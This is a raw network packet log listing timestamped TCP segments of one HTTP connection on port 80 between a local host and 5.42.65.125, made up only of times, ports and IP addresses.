Dec 27, 2023 17:57:26.477449894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.477648973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477659941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477720022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.477775097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477785110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477797985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477804899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477830887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.477833986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477845907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477849960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.477854013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477863073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477870941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477880001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477880955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.477889061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477895975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477897882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.477902889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477932930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.477967024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477976084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477988958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.477997065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478003979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478013992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478017092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.478055000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.478403091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478411913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478427887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478437901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478466034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.478502989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478513002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478519917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478527069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478535891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478543997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478553057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.478563070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478570938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478583097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.478596926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478616953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478619099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.478626966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478657961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.478669882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478681087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478707075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478730917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.478737116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478746891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478800058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.478863955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478902102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478909969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478918076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478918076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.478930950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478938103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478945971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478948116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.478967905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478974104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.478976965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.478991032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.479015112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.479309082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479317904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479326963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479336023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479345083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479357958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.479371071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.479470015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479502916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479511023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479531050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.479557991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.479603052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479613066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479626894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479635954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479644060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479660988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479666948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.479671001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479686022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479691029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.479708910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479717970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479724884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.479726076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479736090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479743958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479767084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.479789972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.479796886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479846954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.479942083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.479994059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480001926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480026007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.480170012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480179071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480221987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.480237007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480287075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480288982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.480297089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480310917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480319023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480326891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480341911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.480365038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480372906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480374098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.480382919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480391979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480398893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480407953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480407953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.480417013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480432987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.480451107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.480469942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.480475903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480484962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480499029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480508089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480520964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480529070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.480556965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.480557919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480566978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480580091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480587959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480595112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480612993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.480633974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.480879068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480890036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480902910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480926037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480936050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480937004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.480945110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.480968952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.480987072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.480987072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481065989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481075048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481082916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481091976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481100082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481106997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481112003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.481116056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481123924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481143951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.481165886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.481175900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481219053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.481281042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481290102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481303930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481338978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.481342077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481353045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481398106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.481647015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481688976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481692076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.481698990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481708050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481729031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481739044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481745958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.481746912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481770039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481774092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.481797934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.481889009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481900930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481915951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481928110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481935978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481945038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481945992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.481955051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.481981039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.482002974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.482091904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482100964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482112885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482120991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482129097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482142925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482142925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.482151031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482161999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482173920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482177019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.482183933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482197046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482202053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.482206106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482219934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482228041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482229948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.482254028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.482273102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.482618093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482692957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482702017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482712030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482747078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.482772112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482780933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482789993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482798100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482812881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482817888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.482822895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482839108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482842922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.482846022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482863903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482866049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.482872963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482887983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482894897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.482908964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482918024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482922077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.482927084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482934952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482958078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.482973099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.482985973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.482995987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483037949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.483185053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483195066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483252048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.483258963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483268023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483283043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483302116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483319044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.483330965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.483345985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483355045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483405113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.483407974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483417988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483465910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.483469009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483479977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483493090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483541965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483546019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.483551979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483565092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483575106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483588934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483597040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.483598948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483608961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483622074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.483640909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.483668089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483676910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483684063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483691931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483705997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483712912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483715057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.483721018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483727932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483736038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.483742952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.483766079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.483787060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.484097958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484108925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484146118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.484163046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484217882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484226942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484247923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484256029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484272957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.484297037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.484299898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484373093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484381914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484383106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.484421015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.484430075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484441042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484453917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484462023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484492064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.484510899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.484525919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484534979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484549046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484556913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484565020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484581947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.484581947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484594107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484611988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.484631062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.484802008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484848022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.484855890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.485032082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485040903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485054016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485061884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485068083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485081911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485086918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.485090017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485099077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485105991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485114098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485114098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.485127926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.485153913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.485202074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485210896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485224962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.485234976 CET	80	49738	5.42.65.125	192.168.2.4
